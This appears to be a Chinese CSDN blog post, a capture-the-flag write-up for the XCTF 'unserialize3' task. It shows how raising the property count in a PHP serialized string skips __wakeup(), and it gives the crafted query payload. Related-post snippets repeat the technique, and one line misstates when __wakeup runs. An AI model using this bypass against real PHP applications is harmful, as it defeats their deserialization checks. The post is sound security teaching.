XCTF-unserialize3(php __wakeup()函数的利用)

最新推荐文章于 2024-05-29 12:33:55 发布
最新推荐文章于 2024-05-29 12:33:55 发布
阅读量1k 收藏 1
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44823018/article/details/103931616
版权

题目如下:
在这里插入图片描述
考点:如何跳过__wakeup()函数。

首先看看__wakeup()原理:
__wakeup()原理:将在序列化之后立即被调用。
漏洞原理:当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。

于是我们现在php在线测试构造代码:

<?php
class xctf{
public $flag =111;
public function __wakeup(){
exit(‘bad requests’);
}
}
$c = new xctf();
print(serialize($c));
?>

得到结果O:4:”xctf”:1:{s:4:”flag”;s:3:”111″;}

由于要让表示属性个数的值大于其真实值,所以把1改为2:

于是构造payload:/?code=O:4:”xctf”:2:{s:4:”flag”;s:3:”111″;}

得到flag:
在这里插入图片描述

Uranusky_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
php unserialize实例,php unserialize()/wakeup()引发的漏洞
weixin_29539581的博客
03-16 257
unserialize和serialize这里不做赘述。unserialize的漏洞在magic function上,如果一个类定义了__wakup()和__destruct(),则该类的实例被反序列化时,会自动调用__wakeup(), 生命周期结束时,则调用__desturct()。下面提供一个简单的demo.class Demo{public $data;public function __...
PHP面向对象(OOP)编程完全教程:22.把对象串行化serialize()方法
ben_wong的专栏
11-12 812
有时候需要把一个对象在网络上传输,为了方便传输,可以把整个对象转化为二进制串,等到达另一端时,再还原为原来的对象,这个过程称之为串行化(也叫序列化), 就像我们现在想把一辆汽车通过轮船运到美国去,因为汽车的体积比较大,我们可以把汽车拆开成小的部件,然后我们把这些部件通过轮般运到美国去,到了美国再把这些部件组装回汽车。 有两种情况我们必须把对象串行化,第一种情况就是把一个对象在网络中传输的时候要将
PHP反序列化--_wakeup()绕过
2302_79800344的博客
03-18 446
【代码】PHP反序列化--_wakeup()绕过。
unserialize3
sinat_31884905的博客
02-19 321
CTF竞赛 | PHP反序列化基础 原创 betaseclabs 贝塔安全实验室 1周前 通过序列化与反序列化我们可以很方便的在PHP中传递对象,下面小编给大家介绍反序列化的原理和一些常见的利用方式。 01 序列化和反序列化概述 (1)序列化和反序列化: 序列化:将对象的状态信息转换成可存储或者传输的形式过程; 反序列化:将可存储或者传输的形式过程恢复为对象的过程; 存储形式:二进制、XML、JSON (2)常见反序列化漏洞: Weblogic: CVE-2018-2893、CVE-2018-2628、
PHP反序列化-unserialize3(攻防世界)
Curry197的博客
05-31 624
题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 解题思路: wakeup()函数是在对象被反序列化之后被调用 但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。 绕过wakeup函数执行 wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点 只要序
xctf-unserialize3php反序列化学习记录)
qq_39670065的博客
09-26 404
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 发现有__wakeup函数,这个函数php中的一个magic函数,常用在反序列化操作中,如重新建立数据库连接,或执行其它初始化操作 先来学习一下php序列化与反序列化 序列化: 函数 : serialize() 把复杂的数据类型压缩到一个字符串中,数据类型可以是数组,字符串,对象等。序列化一个对象将会保存对象的所有变.
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
php serialize和unserialize以及__sleep() __wakeup()
continue my dream
09-08 647
序列化的使用场合: 1.数组或对象在网络传输的时候 2.对象或者数组存储在文件或写入数据库的时候 用途可以用作注册class文件---一般用static的数组变量注册 这样可以避免每次都需要重复扫描目录下的类-----当我们在大量导入文件的时候 __sleep() __wakeup()这两个函数分别实现对象或数组的部分序列化和反序列化时属性的变化 这都是我们需要永久存储的数据,避免
unserialize函数和__wakeup魔术方法
Home to come
04-18 638
之前做过unserialize的题,当时看了wp,做是做出来来了,但是没有看懂这到底是什么东东,这次再次碰见了,认真的搜索了一下原理 什么是serialize? PHP 序列化后的内容是简单的文本格式,但是对字母大小写和空白(空格、回车、换行等)敏感,而且字符串是按照字节(或者说是 8 位的字符)计算的,因此,更合适的说法是 PHP 序列化后的内容是字节流格式。因此用其他语言实现时,如果所实现的...
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3446
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2092
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php反序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1088
打开题目地址: 这也是一个php反序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 541
unserialize3(来自xctf web进阶区) unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 441
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
PbootCMS后台用户账号密码时进行重置工具
最新发布
itfans123的博客
05-29 245
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
pure_color xctf
07-16
### 回答3: pure_color xctf 是一个CTF(Capture The Flag,夺旗赛)竞赛平台。CTF是一种网络安全竞赛,旨在让参赛者通过解决一系列的密码学、逆向工程、漏洞利用等问题来获取旗标,比赛者可以通过这些旗标来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Uranusky_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值